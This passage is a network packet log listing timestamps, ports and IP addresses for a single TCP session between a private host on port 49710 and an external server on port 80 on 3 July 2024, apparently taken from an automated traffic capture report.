Jul 3, 2024 18:08:39.513858080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.513884068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514005899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514019012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514029980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514040947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514049053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514054060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514066935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514096022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514173031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514183044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514194965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514209986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514229059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514329910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514341116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514353037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514364004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514377117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514385939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514385939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514388084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514399052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514399052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514427900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514595985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514606953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514617920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514628887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514636040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514641047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514651060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514653921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514663935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514674902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514679909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514687061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514698029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514709949 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514728069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.514895916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.514929056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515064955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515074968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515085936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515096903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515108109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515108109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515119076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515125036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515130997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515141964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515153885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515163898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515172958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515172958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515182972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515194893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515197039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515219927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515239000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515481949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515494108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515506029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515516996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515522957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515527964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515537024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515567064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515722990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515734911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515746117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515757084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515762091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515768051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515779018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515784979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515789986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515800953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515813112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515816927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515827894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515836000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515839100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515847921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515851974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515868902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515873909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515881062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515892029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515902042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515902996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515914917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515918016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515925884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515937090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.515942097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.515970945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516494989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516506910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516518116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516529083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516541004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516544104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516551971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516562939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516571045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516572952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516578913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516592979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516607046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516763926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516773939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516786098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516797066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516803026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516808987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516819000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516851902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516941071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516952991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516963959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516974926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516977072 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.516985893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.516995907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517007113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517008066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517019987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517028093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517030954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517041922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517047882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517054081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517070055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517075062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517081976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517091990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517092943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517112017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517116070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517129898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517155886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517604113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517616034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517621994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517627954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517635107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517644882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517656088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517663956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517666101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.517690897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.517721891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602303028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602360010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602505922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602530003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602544069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602555990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602560997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602579117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602580070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602591038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602602959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602612019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602613926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602624893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602643967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602650881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602663040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602668047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602674961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602686882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602693081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602699995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602721930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602737904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602897882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602910995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602932930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602946043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602947950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602963924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602974892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602981091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602987051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.602993965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.602998972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603009939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603024006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603195906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603213072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603224993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603229046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603236914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603247881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603251934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603259087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603269100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603271961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603295088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603312016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603457928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603468895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603480101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603492975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603508949 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603537083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603548050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603559017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603569984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603569984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603580952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603591919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603593111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603616953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603634119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603787899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603821993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603905916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603918076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603929043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603939056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603941917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603950977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603961945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.603962898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603974104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603986025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.603986025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604002953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604018927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604270935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604281902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604294062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604304075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604304075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604315996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604319096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604326963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604336977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604337931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604362965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604378939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604542971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604552984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604563951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604574919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604579926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604587078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604597092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604607105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604608059 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604624987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604628086 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604636908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604645014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604646921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604660034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604670048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604671001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604681015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604692936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604698896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604705095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604715109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604716063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604727030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.604739904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.604818106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605129004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605165005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605334044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605345011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605362892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605369091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605374098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605385065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605386019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605397940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605403900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605410099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605420113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605429888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605431080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605441093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605444908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605453014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605463982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605472088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605478048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605489016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605500937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605500937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605513096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605518103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605525017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605535984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605541945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605549097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.605570078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.605583906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.606245995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606257915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606270075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606275082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606280088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606286049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606286049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.606292009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606297970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606302977 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606308937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606314898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606324911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606331110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606345892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606359005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606360912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.606369972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606381893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606391907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.606395006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.606414080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.606429100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691062927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691082954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691092968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691118956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691139936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691148996 CEST	49710	80	192.168.2.6	85.28.47.4
